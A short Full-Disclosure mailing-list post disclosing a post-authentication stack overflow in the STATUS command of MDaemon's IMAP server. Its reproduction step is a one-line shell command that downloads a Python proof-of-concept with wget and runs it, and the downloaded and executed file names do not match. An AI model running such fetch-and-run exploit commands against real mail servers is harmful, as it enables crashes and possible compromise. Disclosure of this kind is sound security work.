Let it be known that this bug is after authentication ("postauth") and
therefore useless.
In the current version of Mdaemon from ALTN there exists an easy to
exploit, run-of-the-mill stack overflow.
By authenticating and sending a large argument to the STATUS command in
the IMAP component, a buffer will be overflown, and a access violation
will be caused.
To reproduce:
cd SMUDGE;wget
http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python
Mdaemon7.0.0.1Stack.py.
Change the user and password first.
Thanks to:
- Dave Aitel for his neet spike scripts which convert to SMUDGE scripts
quite easily :)
- rootkit.com
Not sure if the vendor knows about it.
Thanks,
nd
ps: second public release from the UBC, we have to make space for the new
vulns :)
--
http://felinemenace.org/~nd
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
